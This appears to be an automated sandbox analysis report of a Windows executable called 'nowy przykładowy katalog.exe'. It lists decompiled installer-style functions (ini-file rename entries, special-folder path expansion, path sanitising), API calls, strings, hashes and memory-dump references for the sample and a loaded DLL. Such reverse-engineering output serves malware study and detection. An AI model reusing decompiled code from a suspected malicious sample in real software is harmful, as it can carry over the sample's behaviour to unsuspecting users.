                                                  • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                  • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                  • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                  • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E00405915(void* __eflags) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t15;
                                                  				long _t16;
                                                  				intOrPtr _t18;
                                                  				int _t20;
                                                  				void* _t28;
                                                  				long _t29;
                                                  				intOrPtr* _t37;
                                                  				int _t43;
                                                  				void* _t44;
                                                  				long _t47;
                                                  				CHAR* _t49;
                                                  				void* _t51;
                                                  				void* _t53;
                                                  				intOrPtr* _t54;
                                                  				void* _t55;
                                                  				void* _t56;
                                                  
                                                  				_t15 = E00405F57(2);
                                                  				_t49 =  *(_t55 + 0x18);
                                                  				if(_t15 != 0) {
                                                  					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                  					if(_t20 != 0) {
                                                  						L16:
                                                  						 *0x42ecb0 =  *0x42ecb0 + 1;
                                                  						return _t20;
                                                  					}
                                                  				}
                                                  				 *0x42c230 = 0x4c554e;
                                                  				if(_t49 == 0) {
                                                  					L5:
                                                  					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
                                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                                  						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
                                                  						_t18 =  *0x42ec30; // 0x79ee58
                                                  						_t56 = _t55 + 0x10;
                                                  						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
                                                  						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
                                                  						_t53 = _t20;
                                                  						 *(_t56 + 0x14) = _t53;
                                                  						if(_t53 == 0xffffffff) {
                                                  							goto L16;
                                                  						}
                                                  						_t47 = GetFileSize(_t53, 0);
                                                  						_t7 = _t43 + 0xa; // 0xa
                                                  						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                  						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                  							L15:
                                                  							_t20 = CloseHandle(_t53);
                                                  							goto L16;
                                                  						} else {
                                                  							if(E00405813(_t51, "[Rename]\r\n") != 0) {
                                                  								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
                                                  								if(_t28 == 0) {
                                                  									L13:
                                                  									_t29 = _t47;
                                                  									L14:
                                                  									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
                                                  									SetFilePointer(_t53, 0, 0, 0);
                                                  									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                  									GlobalFree(_t51);
                                                  									goto L15;
                                                  								}
                                                  								_t37 = _t28 + 1;
                                                  								_t44 = _t51 + _t47;
                                                  								_t54 = _t37;
                                                  								if(_t37 >= _t44) {
                                                  									L21:
                                                  									_t53 =  *(_t56 + 0x14);
                                                  									_t29 = _t37 - _t51;
                                                  									goto L14;
                                                  								} else {
                                                  									goto L20;
                                                  								}
                                                  								do {
                                                  									L20:
                                                  									 *((char*)(_t43 + _t54)) =  *_t54;
                                                  									_t54 = _t54 + 1;
                                                  								} while (_t54 < _t44);
                                                  								goto L21;
                                                  							}
                                                  							E00405BC7(_t51 + _t47, "[Rename]\r\n");
                                                  							_t47 = _t47 + 0xa;
                                                  							goto L13;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					CloseHandle(E0040589E(_t49, 0, 1));
                                                  					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
                                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  				return _t16;
                                                  			}























                                                  APIs
                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                  • GetShortPathNameA.KERNEL32 ref: 0040596B
                                                  • GetShortPathNameA.KERNEL32 ref: 00405988
                                                  • wsprintfA.USER32 ref: 004059A6
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                  • GlobalFree.KERNEL32 ref: 00405A65
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                    • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                    • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                  • String ID: %s=%s$Xy$[Rename]
                                                  • API String ID: 3445103937-658998945
                                                  • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                  • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                  • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                  • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                  				signed int _v8;
                                                  				struct _ITEMIDLIST* _v12;
                                                  				signed int _v16;
                                                  				signed char _v20;
                                                  				signed int _v24;
                                                  				signed char _v28;
                                                  				signed int _t36;
                                                  				CHAR* _t37;
                                                  				signed int _t39;
                                                  				int _t40;
                                                  				char _t50;
                                                  				char _t51;
                                                  				char _t53;
                                                  				char _t55;
                                                  				void* _t63;
                                                  				signed int _t69;
                                                  				intOrPtr _t73;
                                                  				signed int _t74;
                                                  				signed int _t75;
                                                  				intOrPtr _t79;
                                                  				char _t83;
                                                  				void* _t85;
                                                  				CHAR* _t86;
                                                  				void* _t88;
                                                  				signed int _t95;
                                                  				signed int _t97;
                                                  				void* _t98;
                                                  
                                                  				_t88 = __esi;
                                                  				_t85 = __edi;
                                                  				_t63 = __ebx;
                                                  				_t36 = _a8;
                                                  				if(_t36 < 0) {
                                                  					_t79 =  *0x42e3fc; // 0x7a3d7a
                                                  					_t36 =  *(_t79 - 4 + _t36 * 4);
                                                  				}
                                                  				_t73 =  *0x42ec58; // 0x7a2864
                                                  				_t74 = _t73 + _t36;
                                                  				_t37 = 0x42dbc0;
                                                  				_push(_t63);
                                                  				_push(_t88);
                                                  				_push(_t85);
                                                  				_t86 = 0x42dbc0;
                                                  				if(_a4 - 0x42dbc0 < 0x800) {
                                                  					_t86 = _a4;
                                                  					_a4 = _a4 & 0x00000000;
                                                  				}
                                                  				while(1) {
                                                  					_t83 =  *_t74;
                                                  					if(_t83 == 0) {
                                                  						break;
                                                  					}
                                                  					__eflags = _t86 - _t37 - 0x400;
                                                  					if(_t86 - _t37 >= 0x400) {
                                                  						break;
                                                  					}
                                                  					_t74 = _t74 + 1;
                                                  					__eflags = _t83 - 0xfc;
                                                  					_a8 = _t74;
                                                  					if(__eflags <= 0) {
                                                  						if(__eflags != 0) {
                                                  							 *_t86 = _t83;
                                                  							_t86 =  &(_t86[1]);
                                                  							__eflags = _t86;
                                                  						} else {
                                                  							 *_t86 =  *_t74;
                                                  							_t86 =  &(_t86[1]);
                                                  							_t74 = _t74 + 1;
                                                  						}
                                                  						continue;
                                                  					}
                                                  					_t39 =  *(_t74 + 1);
                                                  					_t75 =  *_t74;
                                                  					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                  					_a8 = _a8 + 2;
                                                  					_v28 = _t75 | 0x00000080;
                                                  					_t69 = _t75;
                                                  					_v24 = _t69;
                                                  					__eflags = _t83 - 0xfe;
                                                  					_v20 = _t39 | 0x00000080;
                                                  					_v16 = _t39;
                                                  					if(_t83 != 0xfe) {
                                                  						__eflags = _t83 - 0xfd;
                                                  						if(_t83 != 0xfd) {
                                                  							__eflags = _t83 - 0xff;
                                                  							if(_t83 == 0xff) {
                                                  								__eflags = (_t39 | 0xffffffff) - _t95;
                                                  								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                  							}
                                                  							L41:
                                                  							_t40 = lstrlenA(_t86);
                                                  							_t74 = _a8;
                                                  							_t86 =  &(_t86[_t40]);
                                                  							_t37 = 0x42dbc0;
                                                  							continue;
                                                  						}
                                                  						__eflags = _t95 - 0x1d;
                                                  						if(_t95 != 0x1d) {
                                                  							__eflags = (_t95 << 0xa) + 0x42f000;
                                                  							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
                                                  						} else {
                                                  							E00405B25(_t86,  *0x42ec28);
                                                  						}
                                                  						__eflags = _t95 + 0xffffffeb - 7;
                                                  						if(_t95 + 0xffffffeb < 7) {
                                                  							L32:
                                                  							E00405E29(_t86);
                                                  						}
                                                  						goto L41;
                                                  					}
                                                  					_t97 = 2;
                                                  					_t50 = GetVersion();
                                                  					__eflags = _t50;
                                                  					if(_t50 >= 0) {
                                                  						L12:
                                                  						_v8 = 1;
                                                  						L13:
                                                  						__eflags =  *0x42eca4;
                                                  						if( *0x42eca4 != 0) {
                                                  							_t97 = 4;
                                                  						}
                                                  						__eflags = _t69;
                                                  						if(_t69 >= 0) {
                                                  							__eflags = _t69 - 0x25;
                                                  							if(_t69 != 0x25) {
                                                  								__eflags = _t69 - 0x24;
                                                  								if(_t69 == 0x24) {
                                                  									GetWindowsDirectoryA(_t86, 0x400);
                                                  									_t97 = 0;
                                                  								}
                                                  								while(1) {
                                                  									__eflags = _t97;
                                                  									if(_t97 == 0) {
                                                  										goto L29;
                                                  									}
                                                  									_t51 =  *0x42ec24; // 0x74691340
                                                  									_t97 = _t97 - 1;
                                                  									__eflags = _t51;
                                                  									if(_t51 == 0) {
                                                  										L25:
                                                  										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                  										__eflags = _t53;
                                                  										if(_t53 != 0) {
                                                  											L27:
                                                  											 *_t86 =  *_t86 & 0x00000000;
                                                  											__eflags =  *_t86;
                                                  											continue;
                                                  										}
                                                  										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                  										__imp__CoTaskMemFree(_v12);
                                                  										__eflags = _t53;
                                                  										if(_t53 != 0) {
                                                  											goto L29;
                                                  										}
                                                  										goto L27;
                                                  									}
                                                  									__eflags = _v8;
                                                  									if(_v8 == 0) {
                                                  										goto L25;
                                                  									}
                                                  									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                  									__eflags = _t55;
                                                  									if(_t55 == 0) {
                                                  										goto L29;
                                                  									}
                                                  									goto L25;
                                                  								}
                                                  								goto L29;
                                                  							}
                                                  							GetSystemDirectoryA(_t86, 0x400);
                                                  							goto L29;
                                                  						} else {
                                                  							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
                                                  							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
                                                  							__eflags =  *_t86;
                                                  							if( *_t86 != 0) {
                                                  								L30:
                                                  								__eflags = _v16 - 0x1a;
                                                  								if(_v16 == 0x1a) {
                                                  									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                  								}
                                                  								goto L32;
                                                  							}
                                                  							E00405BE9(_t72, _t86, _t97, _t86, _v16);
                                                  							L29:
                                                  							__eflags =  *_t86;
                                                  							if( *_t86 == 0) {
                                                  								goto L32;
                                                  							}
                                                  							goto L30;
                                                  						}
                                                  					}
                                                  					__eflags = _t50 - 0x5a04;
                                                  					if(_t50 == 0x5a04) {
                                                  						goto L12;
                                                  					}
                                                  					__eflags = _v16 - 0x23;
                                                  					if(_v16 == 0x23) {
                                                  						goto L12;
                                                  					}
                                                  					__eflags = _v16 - 0x2e;
                                                  					if(_v16 == 0x2e) {
                                                  						goto L12;
                                                  					} else {
                                                  						_v8 = _v8 & 0x00000000;
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				 *_t86 =  *_t86 & 0x00000000;
                                                  				if(_a4 == 0) {
                                                  					return _t37;
                                                  				}
                                                  				return E00405BC7(_a4, _t37);
                                                  			}































                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                                                  • GetWindowsDirectoryA.KERNEL32(rtrystwqtc,00000400), ref: 00405D1F
                                                  • SHGetSpecialFolderLocation.SHELL32(?,0041F64C), ref: 00405D5B
                                                  • SHGetPathFromIDListA.SHELL32(0041F64C,rtrystwqtc), ref: 00405D69
                                                  • CoTaskMemFree.OLE32(0041F64C), ref: 00405D74
                                                  • lstrcatA.KERNEL32(rtrystwqtc,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                  • lstrlenA.KERNEL32(rtrystwqtc,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$d(z$rtrystwqtc$z=z
                                                  • API String ID: 900638850-1208194997
                                                  • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                  • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                  • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                  • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Local$AllocEnvironmentExpandFreeQueryStringsValue$Close_memsetlstrcpylstrlen
                                                  • String ID: (hkey=%p,%s,%p)
                                                  • API String ID: 635717125-193384532
                                                  • Opcode ID: 9b225da0aaf896812b149113195be377f8b47db604d3d868dda308774e68b533
                                                  • Instruction ID: 1011d7243061e5562b31b92ba7df54f300b98b5ece319cf55dcf47d29dde945c
                                                  • Opcode Fuzzy Hash: 9b225da0aaf896812b149113195be377f8b47db604d3d868dda308774e68b533
                                                  • Instruction Fuzzy Hash: 0D816AB4D043599FDB04EFA8D58969EBBF0FF48340F10892AE899A7314D774A944CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32 ref: 10001625
                                                    • Part of subcall function 10003D50: RegCreateKeyExW.ADVAPI32 ref: 10003DAB
                                                    • Part of subcall function 10003D50: GetSysColor.USER32 ref: 10003DD4
                                                    • Part of subcall function 10003D50: _strlen.LIBCMT ref: 10003E40
                                                    • Part of subcall function 10003D50: RegSetValueExA.ADVAPI32 ref: 10003E77
                                                    • Part of subcall function 10003D50: RegCloseKey.ADVAPI32 ref: 10003E94
                                                  • SystemParametersInfoW.USER32 ref: 10001678
                                                  • RegSetValueExW.ADVAPI32 ref: 100016C1
                                                  • _memset.LIBCMT ref: 10001701
                                                  • SystemParametersInfoW.USER32 ref: 10001731
                                                  • RegSetValueExW.ADVAPI32 ref: 1000177A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Value$CreateInfoParametersSystem$CloseColor_memset_strlen
                                                  • String ID: ?$NonClientMetrics$Software\Microsoft\Windows\CurrentVersion\ThemeManager$\
                                                  • API String ID: 4214700841-1143970397
                                                  • Opcode ID: ecb6221c902d1d90f029a9aa8135ace11849b97b5f4bd3980d845a289d195a75
                                                  • Instruction ID: b10f47c284f4a25536da697fad620665cb1854ce7e8a2539d6541ec92191b9c4
                                                  • Opcode Fuzzy Hash: ecb6221c902d1d90f029a9aa8135ace11849b97b5f4bd3980d845a289d195a75
                                                  • Instruction Fuzzy Hash: C551A3B48083159FDB54DF64C89839EBBF0FB84344F10895DE499A7350DB759A88CF82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 10003D50: RegCreateKeyExW.ADVAPI32 ref: 10003DAB
                                                    • Part of subcall function 10003D50: GetSysColor.USER32 ref: 10003DD4
                                                    • Part of subcall function 10003D50: _strlen.LIBCMT ref: 10003E40
                                                    • Part of subcall function 10003D50: RegSetValueExA.ADVAPI32 ref: 10003E77
                                                    • Part of subcall function 10003D50: RegCloseKey.ADVAPI32 ref: 10003E94
                                                  • SystemParametersInfoW.USER32 ref: 10001C76
                                                  • SystemParametersInfoW.USER32 ref: 10001CB0
                                                  • _memset.LIBCMT ref: 10001CF0
                                                  • SystemParametersInfoW.USER32 ref: 10001D20
                                                  • SystemParametersInfoW.USER32 ref: 10001D50
                                                  • _memset.LIBCMT ref: 10001D88
                                                  • SystemParametersInfoW.USER32 ref: 10001DAE
                                                  • SystemParametersInfoW.USER32 ref: 10001DDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: InfoParametersSystem$_memset$CloseColorCreateValue_strlen
                                                  • String ID: \$\
                                                  • API String ID: 4051568106-164819647
                                                  • Opcode ID: e86eaccf48e01d306096e01cfce6499f24cdd14e702cf35f8c1faeaa67c55391
                                                  • Instruction ID: 25441f60d2184d1c2127a7067067bf1a089242a184018c3b10890c33f48756fc
                                                  • Opcode Fuzzy Hash: e86eaccf48e01d306096e01cfce6499f24cdd14e702cf35f8c1faeaa67c55391
                                                  • Instruction Fuzzy Hash: 7441B0B48093159FE754EF28C98839EBBF0FF44304F10C99DE49897250DB7999848F42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CloseColorCreateValue_strlen
                                                  • String ID: %d %d %d$?$Control Panel\Colors
                                                  • API String ID: 1366408527-47058604
                                                  • Opcode ID: 5bba8b40adcde4f59441a719dbe2af6fcb2358c86d81045ac14223ac18ffac2f
                                                  • Instruction ID: fc9d29c2e160d3d7f392e6ac5403772cc1770c915a38a1b3bc6d914128e9e0ee
                                                  • Opcode Fuzzy Hash: 5bba8b40adcde4f59441a719dbe2af6fcb2358c86d81045ac14223ac18ffac2f
                                                  • Instruction Fuzzy Hash: 764115B69083159FEB04DF69D4846AEBBF1FF88314F00892EE489A7341D7759948CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalAddAtomW.KERNEL32 ref: 10001015
                                                  • GlobalAddAtomW.KERNEL32 ref: 1000102D
                                                  • GlobalAddAtomW.KERNEL32 ref: 10001045
                                                  • GlobalAddAtomW.KERNEL32 ref: 1000105D
                                                    • Part of subcall function 10001080: RegOpenKeyW.ADVAPI32 ref: 1000109F
                                                    • Part of subcall function 10001080: RegQueryValueExW.ADVAPI32 ref: 10001103
                                                    • Part of subcall function 10001080: RegQueryValueExW.ADVAPI32 ref: 10001198
                                                    • Part of subcall function 10001080: RegQueryValueExW.ADVAPI32 ref: 100011FA
                                                    • Part of subcall function 10001080: RegCloseKey.ADVAPI32 ref: 1000124C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AtomGlobal$QueryValue$CloseOpen
                                                  • String ID: ux_dialogtheme$ux_subapp$ux_subidlst$ux_theme
                                                  • API String ID: 4274996849-3424715226
                                                  • Opcode ID: 5e00b0d77e9f3ff627b14cc8c305e043a319390189e961234fff0d7b0717eb83
                                                  • Instruction ID: cc3f60c883018a98a1aae38f66b26a9a632f1e8596c1e5eb3b4238c224fc026c
                                                  • Opcode Fuzzy Hash: 5e00b0d77e9f3ff627b14cc8c305e043a319390189e961234fff0d7b0717eb83
                                                  • Instruction Fuzzy Hash: 31F09CB95152A4CFEB05EFB8D9CA45A7B70BB00305B00C52EE88947264EBB5E158DB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405E29(CHAR* _a4) {
                                                  				char _t5;
                                                  				char _t7;
                                                  				char* _t15;
                                                  				char* _t16;
                                                  				CHAR* _t17;
                                                  
                                                  				_t17 = _a4;
                                                  				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                  					_t17 =  &(_t17[4]);
                                                  				}
                                                  				if( *_t17 != 0 && E00405727(_t17) != 0) {
                                                  					_t17 =  &(_t17[2]);
                                                  				}
                                                  				_t5 =  *_t17;
                                                  				_t15 = _t17;
                                                  				_t16 = _t17;
                                                  				if(_t5 != 0) {
                                                  					do {
                                                  						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
                                                  							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
                                                  							_t16 = CharNextA(_t16);
                                                  						}
                                                  						_t17 = CharNextA(_t17);
                                                  						_t5 =  *_t17;
                                                  					} while (_t5 != 0);
                                                  				}
                                                  				 *_t16 =  *_t16 & 0x00000000;
                                                  				while(1) {
                                                  					_t16 = CharPrevA(_t15, _t16);
                                                  					_t7 =  *_t16;
                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                  						break;
                                                  					}
                                                  					 *_t16 =  *_t16 & 0x00000000;
                                                  					if(_t15 < _t16) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				return _t7;
                                                  			}









                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E2A, 00405E2F
                                                  • *?|<>/":, xrefs: 00405E71
                                                  • "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" , xrefs: 00405E65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-535955014
                                                  • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                  • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyW.ADVAPI32 ref: 1000152B
                                                  • RegSetValueExW.ADVAPI32 ref: 10001571
                                                  • RegCloseKey.ADVAPI32 ref: 10001583
